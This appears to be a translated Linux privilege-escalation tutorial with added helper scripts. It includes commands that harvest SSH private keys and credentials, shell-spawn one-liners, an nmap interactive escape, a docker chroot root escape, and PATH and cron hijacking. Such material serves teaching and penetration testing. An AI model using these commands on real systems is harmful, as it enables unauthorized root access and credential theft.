Reference link: https://xz.aliyun.com/t/7924
The essence of penetration testing is information gathering, and the first step is to collect as much information as possible. The general idea is to use what has been gathered to find usable files, scripts, software, users, kernel vulnerabilities, hijacking opportunities, platform-specific vulnerabilities, framework flaws, components and so on, then write or execute malicious commands/scripts/shells or add a high-privilege user to escalate privileges, and exploit further from there.
On the target machine, the information to collect is generally as follows:
Kernel, operating system, device information
uname -a Print all available system information
uname -r Kernel version
uname -n System host name
uname -m Kernel architecture (64-bit/32-bit)
hostname System host name
cat /proc/version Kernel information (including the compiler and build date)
cat /etc/*-release Distribution information
cat /etc/issue Distribution information
cat /proc/cpuinfo CPU information
cat /etc/lsb-release # Debian/Ubuntu
cat /etc/redhat-release # Red Hat family
ls /boot | grep vmlinuz- Installed kernel images
Users and groups
cat /etc/passwd List all users on the system
cat /var/mail/root Mail for root (may contain credentials or hints)
cat /var/spool/mail/root Same, on distributions that use /var/spool/mail
cat /etc/group List all groups on the system
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' List all accounts with UID 0 (superusers)
whoami View the current user
w Who is currently logged in and what they are doing
last List of recently logged in users
lastlog Last login information for all users
lastlog -u <username> Last login of the specified user
lastlog | grep -v "Never" Only users who have ever logged in
User permission information
whoami Current user name
id Current user's UID, GID and group memberships
cat /etc/sudoers Who is allowed to execute commands as root (normally readable only by root)
sudo -l Commands the current user may run through sudo, and as which users
Environment information
env Show environment variables
set Show shell variables and functions as well as environment variables
echo $PATH Path information
history Display the command history of the current user
pwd Print the working directory
cat /etc/profile Show default system variables
cat /etc/shells Show available login shells
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
Processes and services
ps aux
ps -ef
top
cat /etc/services
Processes running as root
ps aux | grep root
ps -ef | grep root
Check the installed software
ls -alh /usr/bin/
ls -alh /sbin/
ls -alh /var/cache/yum/
dpkg -l
Services / plugins
Check for insecure service configurations and plugins with known vulnerabilities.
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.......r/' 2>/dev/null # entries under /etc whose "others" read bit is set
Scheduled tasks
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
Are user passwords stored in clear text?
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find / -name "*.php" -print0 | xargs -0 grep -i -n 'var $password' # single quotes so the shell does not expand $password
Are there SSH private keys?
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key
View other users or hosts communicating with the current machine
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w
Log files
cat /var/log/boot.log
cat /var/log/cron
cat /var/log/syslog
cat /var/log/wtmp
cat /var/run/utmp
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/
Note: other common files under /var/log include auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp
Interactive shell
python -c 'import pty;pty.spawn("/bin/bash")'
os.system('/bin/bash') # from inside an interactive python session (import os first)
/bin/sh -i
SUID && SGID privilege escalation (finding candidates)
Reference material: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.
find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null # SGID or SUID (the parentheses matter: without them -o binds only -perm -u=s to -type f)
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)
find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null # find starting at root (/), SGID or SUID, not symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
Writable / executable directories
find / -writable -type d 2>/dev/null # directories writable by the current user
find / -perm -222 -type d 2>/dev/null # world-writeable folders
find / -perm -o=w -type d 2>/dev/null # world-writeable folders
find / -perm -o=x -type d 2>/dev/null # world-executable folders
find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null # world-writeable & executable folders
Check the installed tools
find / -name "perl*" 2>/dev/null
find / -name "python*" 2>/dev/null
find / -name "gcc*" 2>/dev/null
...
With the information collected above as a basis, specific privilege escalation techniques can be applied.
Kernel exploits
If the target's kernel version is old enough, a kernel exploit is the first thing that comes to mind. Kali ships a local copy of the exploit-db repository, so the searchsploit command can be used to quickly find exploits matching the kernel version.
A classic example is the Dirty COW vulnerability, CVE-2016-5195.
There are some pitfalls in running kernel exploits. The most obvious is the environment: you do not know what the target machine lacks, so an exploit that compiles and runs smoothly locally often fails with puzzling errors on the target. Many exploits are also unstable, and a careless attempt can crash the target machine, so it is best to keep kernel exploits as the last card to play.
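As an added example (not from the original post), the following POSIX shell helper does the version triage one would otherwise do by hand before reaching for searchsploit: it strips the distribution suffix from a `uname -r` string and checks whether the bare version lies in the publicly documented Dirty COW (CVE-2016-5195) range, affected since 2.6.22 and fixed upstream in 4.8.3, 4.7.9 and 4.4.26. Only the CVE comes from the page; the version range is taken from the public advisories, and the function names are assumptions. Distributions backport fixes without bumping the version, so a hit means "check the distro changelog and searchsploit", not "exploitable".

```sh
#!/bin/sh
# Kernel version triage helper (added example, not the original post's code).
# Distros backport fixes without changing the version number, so a hit is a
# reason to look further, not proof of exploitability.

# vercmp A B: prints -1, 0 or 1. Strips anything from the first '-' or '+' on
# ("4.4.0-31-generic" -> "4.4.0"; "3.10.0-327.el7.x86_64" -> "3.10.0").
vercmp() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        sub(/[-+].*/, "", a); sub(/[-+].*/, "", b)
        na = split(a, x, "."); nb = split(b, y, ".")
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            xi = (i in x) ? x[i] + 0 : 0      # missing components count as 0
            yi = (i in y) ? y[i] + 0 : 0
            if (xi < yi) { print "-1"; exit }
            if (xi > yi) { print "1"; exit }
        }
        print "0"
    }'
}

# dirtycow_candidate VERSION: true if VERSION is inside the upstream affected range
# (>= 2.6.22 and below the fix in the matching stable branch: 4.8.3, 4.7.9, 4.4.26).
dirtycow_candidate() {
    v=$1
    [ "$(vercmp "$v" 2.6.22)" -ge 0 ] || return 1
    case "$(printf '%s' "$v" | sed 's/[-+].*//' | cut -d. -f1,2)" in
        4.8) [ "$(vercmp "$v" 4.8.3)" -lt 0 ] ;;
        4.7) [ "$(vercmp "$v" 4.7.9)" -lt 0 ] ;;
        4.4) [ "$(vercmp "$v" 4.4.26)" -lt 0 ] ;;
        *)   [ "$(vercmp "$v" 4.8.3)" -lt 0 ] ;;   # other series: fixed only from 4.8.3 upstream
    esac
}

# triage_kernel VERSION: one-line verdict; on a target: triage_kernel "$(uname -r)"
triage_kernel() {
    if dirtycow_candidate "$1"; then
        echo "$1: inside the CVE-2016-5195 upstream range - check the distro changelog and searchsploit before compiling anything"
    else
        echo "$1: outside the CVE-2016-5195 upstream range"
    fi
}

triage_kernel "$(uname -r)"
```

The same vercmp can be reused for any other version-gated kernel bug; the per-branch cut-offs are the part that has to be looked up per CVE.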
SUID privilege escalation
SUID stands for Set owner User ID up on execution. It is an attribute Linux attaches to an executable: when another user runs the program, it runs with the permissions of the program's owner (SGID does the same for the owning group). Note that this only leads to privilege escalation when the program's owner is UID 0 or another privileged user and the SUID bit is set.
The following commands find all SUID executables.
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
For example, old versions of nmap had an interactive mode from which the user could escape to a shell. If nmap has the SUID bit set, it runs with root permissions, and its interactive mode hands us a "root" shell.
$ nmap --interactive - run nmap in interactive mode
$ !sh - escape from the nmap shell to a system shell
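Added example, not part of the original post: a filter that trims the output of the SUID find above down to binaries that are not normally SUID, which is where nmap-style escapes hide. The baseline list is a constructed, abbreviated set of binaries that carry the SUID bit on stock Debian/Ubuntu and RHEL-family installs; compare against a known-good image of the target's distribution before relying on it. The sample list fed to the filter at the end is constructed as well.

```sh
#!/bin/sh
# SUID triage filter (added example). Reads paths, prints the unusual ones.

# Constructed, abbreviated baseline of binaries that are SUID on a stock install.
KNOWN_SUID="
/usr/bin/passwd /usr/bin/sudo /usr/bin/su /usr/bin/mount /usr/bin/umount
/usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd /usr/bin/newgrp /usr/bin/pkexec
/bin/su /bin/mount /bin/umount
"

# is_known_suid PATH: true if PATH is in the baseline
is_known_suid() {
    for k in $KNOWN_SUID; do
        [ "$k" = "$1" ] && return 0
    done
    return 1
}

# classify_suid: one path per line on stdin; prints
#   "unlisted <path>"  for a system-directory binary missing from the baseline (e.g. nmap)
#   "odd-path <path>"  for a SUID binary outside the usual system directories
# and nothing for baseline entries.
classify_suid() {
    while IFS= read -r p; do
        [ -z "$p" ] && continue
        is_known_suid "$p" && continue
        case "$p" in
            /bin/*|/sbin/*|/usr/bin/*|/usr/sbin/*|/usr/lib/*|/usr/libexec/*)
                printf 'unlisted %s\n' "$p" ;;
            *)  printf 'odd-path %s\n' "$p" ;;
        esac
    done
}

# Constructed sample input standing in for the find output. On a target:
#   find / -user root -perm -4000 -type f 2>/dev/null | classify_suid
printf '%s\n' /usr/bin/passwd /usr/bin/sudo /usr/bin/nmap /usr/local/bin/backup /home/dev/tools/runme | classify_suid
```

Each "unlisted" hit is then checked for a known escape (interactive modes, editor spawns, library or PATH lookups); each "odd-path" hit is usually custom code and worth reading in full.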
Environment variable privilege escalation
$PATH is an environment variable in Linux and Unix-like operating systems that lists the bin and sbin directories to search. When a user runs a command in the terminal, the shell looks the executable up in those directories, in order, to serve the request. Superusers usually also have /sbin and /usr/sbin in their PATH so that administration commands can be run conveniently.
The echo command shows the current user's PATH: echo $PATH
Pay attention to whether PATH contains ".": if it does, binaries and scripts from the current directory are executed in preference to anything later in PATH. For example, everyone knows that ls lists the files of the current directory, but once "." has been added to PATH and an executable file named ls exists in the current directory, typing ls on the command line gives a different result:
Create a new file named ls
Add "." to the environment variable
Type the ls command in the current directory
The ls command that actually runs is "./ls", i.e. the executable named ls in the current directory.
This can be combined with SUID files: if a SUID program calls a system command by its bare name, the command can be hijacked by modifying the environment variable and constructing a malicious file with that name, so the program executes what we want. See: https://xz.aliyun.com/t/2767
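An added example, not from the original post, that reproduces the ls hijack described above in a throwaway directory so it can be run safely: the fake ls only prints a marker instead of spawning a shell. It also includes a check for an empty PATH element (a leading, trailing or doubled colon), which POSIX shells treat exactly like ".". The file names and the marker are assumptions.

```sh
#!/bin/sh
# PATH hijack demonstration (added example). Nothing outside a temp dir is touched.

# make_fake_ls DIR: drop an attacker-controlled "ls" into DIR. A real attack would
# copy /bin/sh here and set the SUID bit, or spawn a reverse shell.
make_fake_ls() {
    printf '#!/bin/sh\necho HIJACKED\n' > "$1/ls"
    chmod 755 "$1/ls"
}

# run_ls_in_dir DIR PATHVALUE: cd into DIR and run a bare `ls` with the given PATH,
# printing whatever that name resolves to.
run_ls_in_dir() {
    (
        cd "$1" || exit 1
        PATH=$2
        export PATH
        ls
    )
}

# path_has_dot PATHVALUE: true if PATH contains "." or an empty element; an empty
# element (":/usr/bin", "/usr/bin:", "/usr/bin::/bin") also means the current directory.
path_has_dot() {
    case ":$1:" in
        *:.:*|*::*) return 0 ;;
        *)          return 1 ;;
    esac
}

# Demo: same directory, same command, different PATH.
demo_path_hijack() {
    tmp=$(mktemp -d) || return 1
    make_fake_ls "$tmp"
    printf 'PATH=<system>   : ls -> %s\n' "$(run_ls_in_dir "$tmp" "$PATH")"
    printf 'PATH=.:<system> : ls -> %s\n' "$(run_ls_in_dir "$tmp" ".:$PATH")"
    if path_has_dot "$PATH"; then
        echo "WARNING: the current PATH contains . or an empty element"
    fi
    rm -rf "$tmp"
}
demo_path_hijack
```

With the system PATH the bare ls lists the directory (one entry, the planted file); with "." first it runs the planted file. A SUID program that calls a command by its bare name is vulnerable in exactly the same way once an attacker controls its PATH, which is why setuid code should invoke absolute paths and reset the environment.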
Scheduled task privilege escalation
The system may have scheduled tasks, generally managed by crontab and run with the permissions of the user who owns them. A non-root user cannot list root's personal crontab, but the system-wide scheduled tasks under /etc/ can be listed.
ls -l /etc/cron*
These are executed with root permissions by default. If an administrator has left such a script writable by any user, we can modify the script and wait for a root shell to connect back.
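Added example, not from the original post: a checker for the case described above. It parses the system crontab format used by /etc/crontab and /etc/cron.d/* (five time fields or an @-keyword, then the user, then the command) and reports commands run as root whose script is world-writable, or sits in a world-writable directory without the sticky bit so it can be replaced. The sample crontab and script names built by the fixture function are constructed; per-user crontabs under /var/spool/cron have no user field and are not covered.

```sh
#!/bin/sh
# Writable root cron job finder (added example). System crontab format only:
#   m h dom mon dow USER command...      or      @reboot USER command...

# cron_commands_for_user FILE [USER]: print the program (first token of the
# command field) of every job that runs as USER (default root).
cron_commands_for_user() {
    awk -v u="${2:-root}" '
        /^[ \t]*#/ || /^[ \t]*$/ { next }                 # comments, blank lines
        /^[ \t]*[A-Za-z_][A-Za-z0-9_]*=/ { next }        # SHELL=, PATH=, MAILTO=
        $1 ~ /^@/ && NF >= 3 && $2 == u { print $3; next } # @reboot, @daily, ...
        NF >= 7 && $6 == u { print $7 }                   # five time fields + user
    ' "$1"
}

# others_writable PATH: true if the "others" write bit is set (column 9 of ls -ld)
others_writable() {
    [ "$(ls -ld "$1" | cut -c9)" = "w" ]
}

# dir_replaceable DIR: true if DIR is world-writable and NOT sticky, i.e. anyone can
# unlink and re-create files in it (/tmp is excluded by its sticky bit).
dir_replaceable() {
    case "$(ls -ld "$1" | cut -c9-10)" in
        w-|wx) return 0 ;;
        *)     return 1 ;;
    esac
}

# writable_cron_targets FILE [USER]: for each absolute-path program run by USER,
# print "file <path>" if the file is world-writable or "dir <path>" if its
# directory lets it be replaced.
writable_cron_targets() {
    cron_commands_for_user "$1" "${2:-root}" | sort -u | while IFS= read -r cmd; do
        case "$cmd" in /*) ;; *) continue ;; esac   # bare names would need PATH resolution
        [ -e "$cmd" ] || continue
        if others_writable "$cmd"; then
            printf 'file %s\n' "$cmd"
        elif dir_replaceable "$(dirname "$cmd")"; then
            printf 'dir %s\n' "$cmd"
        fi
    done
}

# build_sample_fixture DIR: constructed sample data (assumed names) for the demo.
build_sample_fixture() {
    printf '#!/bin/sh\necho backup\n' > "$1/backup.sh"; chmod 777 "$1/backup.sh"  # misconfigured
    printf '#!/bin/sh\necho rotate\n' > "$1/rotate.sh"; chmod 755 "$1/rotate.sh"  # fine
    cat > "$1/crontab" <<EOF
SHELL=/bin/sh
# m h dom mon dow user command
*/5 * * * * root $1/backup.sh --full
0 3 * * * root $1/rotate.sh
@reboot root $1/rotate.sh --boot
15 1 * * * www-data $1/backup.sh
EOF
}

# Demo run. On a target: writable_cron_targets /etc/crontab; for f in /etc/cron.d/*; do writable_cron_targets "$f"; done
tmp=$(mktemp -d)
build_sample_fixture "$tmp"
writable_cron_targets "$tmp/crontab"
rm -rf "$tmp"
```

The check is deliberately based on the mode bits rather than on `[ -w ]`, so it gives the same answer whether it is run as root or as the low-privileged user; jobs that call scripts by a bare name or through an interpreter (`root /usr/bin/python /opt/x.py`) need the second token inspected too.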
Using third-party services
Some server services are configured to listen only on the intranet or on localhost. By attacking them we may gain access to more sensitive files, or be lucky enough to hit a remote root vulnerability.
netstat -antup # list listening services and their owning processes
If several users share a machine that runs docker and the current user is in the docker group, an image can be run directly to obtain root inside the container and, by mounting the host filesystem, modify the host's /etc/passwd to escalate.
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
cat /etc/passwd
After the chroot, /etc/passwd inside the container is the host's /etc/passwd, so a user can be added to it directly to achieve privilege escalation.
Other third-party software and services: see https://atsud0.me/2020/04/14/...
Besides the above, there are many more techniques in practice, for example running sudo directly, cracking hashes obtained from the shadow file, or various ways of guessing the root password. In short, take stock of the system, understand the essentials, and apply them flexibly.